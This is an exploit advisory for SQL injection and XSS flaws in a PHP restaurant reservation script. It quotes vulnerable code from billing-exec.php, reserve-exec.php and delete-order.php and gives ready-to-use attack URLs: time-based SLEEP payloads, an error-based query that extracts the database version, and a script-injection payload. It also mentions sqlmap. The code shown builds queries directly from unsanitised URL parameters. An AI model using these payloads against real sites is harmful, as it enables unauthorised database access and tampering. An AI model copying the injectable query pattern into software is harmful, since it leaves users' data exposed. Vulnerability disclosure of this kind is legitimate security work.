# Exploit Title: &#169;2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerabilty # Date : 22-10-2014 # Author : jsass # Software Link:&#8203; http://sourceforge.net/projects/restaurantmis/files/ # Version: &#8203;1.00 # Tested on: kali linux # Twitter : @KwSecurity # Group : Q8 GRAY HAT TEAM ########### SQL INJECTION [1] billing-exec.php code : function clean($str) { $str = @trim($str); if(get_magic_quotes_gpc()) { $str = stripslashes($str); } return mysql_real_escape_string($str); } //Sanitize the POST values $StreetAddress = clean($_POST['sAddress']); $BoxNo = clean($_POST['box']); $City = clean($_POST['city']); $MobileNo = clean($_POST['mNumber']); $LandlineNo = clean($_POST['lNumber']); // check if the 'id' variable is set in URL // check if the 'id' variable is set in URL if (isset($_GET['id'])) { // get id value $id = $_GET['id']; //Create INSERT query $qry = "INSERT INTO billing_details(member_id,Street_Address,P_O_Box_No,City,Mobile_No,Landline_No) VALUES('$id','$StreetAddress','$BoxNo','$City','$MobileNo','$LandlineNo')"; mysql_query($qry) ; Exploit : http://localhost/RSv1.0.0/billing-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8 [2] reserve-exec.php function clean($str) { $str = @trim($str); if(get_magic_quotes_gpc()) { $str = stripslashes($str); } return mysql_real_escape_string($str); } if(isset($_POST['table'])){ $table_id = clean($_POST['table']); $table_flag = 1; } else if(isset($_POST['partyhall'])){ $partyhall_id = clean($_POST['partyhall']); $partyhall_flag = 1; } if (isset($_GET['id'])){ //get user id $id = $_GET['id']; //Create INSERT query $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')"; mysql_query($qry); //redirect to the reserve success page header("location: reserve-success.php"); }else { die("Reservation failed! Please try again after a few minutes."); } You Can Inject by time-based blind Or Use Sqlmap ... Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8 [3] delete-order.php // check if the 'id' variable is set in URL if (isset($_GET['id'])) { // get id value $id = $_GET['id']; // delete the entry $result = mysql_query("DELETE FROM orders_details WHERE order_id='$id'"); or die("The order does not exist ... \n"); // redirect back to the member index header("Location: member-index.php"); } else // if id isn't set, redirect back to member index { header("Location: member-index.php"); } time-based blind & boolean-based blind & error-based Exploit : http://localhost/RSv1.0.0/delete-order.php?id=1' AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x5138203e3e,Version(),0x3c3c205138,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Q8'='Q8 AND XSS http://localhost/RSv1.0.0/delete-order.php?id=1'><script>alert('jsass')</script> [4] reserve-exec.php if(isset($_POST['table'])){ $table_id = clean($_POST['table']); $table_flag = 1; } else if(isset($_POST['partyhall'])){ $partyhall_id = clean($_POST['partyhall']); $partyhall_flag = 1; } $date = clean($_POST['date']); $time = clean($_POST['time']); //check if the id is set at the link if (isset($_GET['id'])){ //get user id $id = $_GET['id']; //Create INSERT query $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')"; mysql_query($qry); //redirect to the reserve success page header("location: reserve-success.php"); }else { die("Reservation failed! Please try again after a few minutes."); } Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=16' AND SLEEP(5) AND 'Q8'='Q8 ########### Greats : Sec4ever.com & alm3refh.com